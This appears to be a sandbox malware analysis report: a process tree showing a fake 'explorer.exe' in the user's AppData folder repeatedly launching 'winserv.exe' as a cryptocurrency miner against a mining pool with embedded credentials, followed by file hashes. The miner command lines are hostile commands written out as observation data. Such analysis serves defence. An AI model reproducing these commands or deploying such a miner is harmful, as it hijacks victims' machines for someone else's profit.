C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3000
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4704
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4316
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4936
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3420
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4348
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1268
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1976
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3056
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3768
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4284
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2456
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4420
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:916
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1000
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4640
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5952
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2844
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4588
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2136
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4236
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4476
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:404
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1220
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5992
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3548
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2740
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4836
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5856
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4636
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5260
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3160
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5140
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5056
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1468
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:576
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3896
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2728
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2600
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2980
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5304
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3320
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1992
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2916
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3060
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4848
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3448
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5372
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1632
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1456
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4248
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5084
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4656
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5568
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3368
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3012
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1084
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4548
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3900
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6008
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5440
-
Network
MITRE ATT&CK Enterprise v16
Downloads
-
Filesize
48KB
MD5
c4ad493a6bfd212c4e1418ba605020af
SHA1
20272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256
492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512
736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf